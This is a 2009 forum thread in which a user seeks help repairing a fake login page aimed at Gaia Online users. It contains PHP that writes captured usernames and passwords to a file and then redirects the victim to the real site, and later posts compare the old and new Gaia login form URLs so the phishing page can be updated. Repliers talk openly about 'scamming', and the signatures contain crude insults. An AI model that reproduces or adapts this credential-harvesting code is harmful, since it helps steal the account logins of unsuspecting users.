well its been a while since ive been on this site <cant member my old login>
anywho havein an issue with my old flp seems gaia has bypassed this?
and dont mind the ripway link im aware ripway does not work when u send from gaia <3 any one help?
Welcome to Gaia | Gaia Online
my php code
<?php
header("Location: http://www.gaiaonline.com/forums");
$file = 'http://h1.ripway.com/omfgpop/Login.txt';
$handle = fopen("info.txt", "a") ;
fwrite($handle, '');
fwrite($handle, $username);
fwrite($handle, "\r\n");
fwrite($handle, ': ');
fwrite($handle, $password);
fwrite($handle, "\r\n
");
fclose($handle);
exit;
Results 1 to 5 of 5
Thread: f-l-p
- 24 Nov. 2009 03:16am #1
f-l-p
- 24 Nov. 2009 03:57am #2
FLP's are old in general.
You can't "bypass" a FLP.
Try using a different host.3 things.
-Post count can suck my dick.
-I'm an asshole, nice to meet you.
-Grammar Nazi. I will correct you. Don't get offended.[SIGPIC][/SIGPIC]
Don't argue with idiots. They will only bring you down to their level, and crush you with their experience.
- 24 Nov. 2009 04:02am #3
dont care if there old they do the job tryied multiple hosting sites they changed there codeing thus bypassing this one >.> saa go away
- 24 Nov. 2009 04:07am #4I don't care if they're old. They do the job. I tried multiple hosting sites and they changed their coding, thus bypassing this one. >.>
How exactly did they "change their coding"?
Let's say they did. Then try a different method of scamming.3 things.
-Post count can suck my dick.
-I'm an asshole, nice to meet you.
-Grammar Nazi. I will correct you. Don't get offended.[SIGPIC][/SIGPIC]
Don't argue with idiots. They will only bring you down to their level, and crush you with their experience.
- 24 Nov. 2009 04:25am #5
saa see the difference?
<form id="memberloginForm" method="post" action="http://www.gaiaonline.com/auth/login/"> <<new line
<form id="memberloginForm" method="POST" action="http://login.gaiaonline.com/gaia/login.php"> << old lineLast edited by hehe; 24 Nov. 2009 at 04:27am.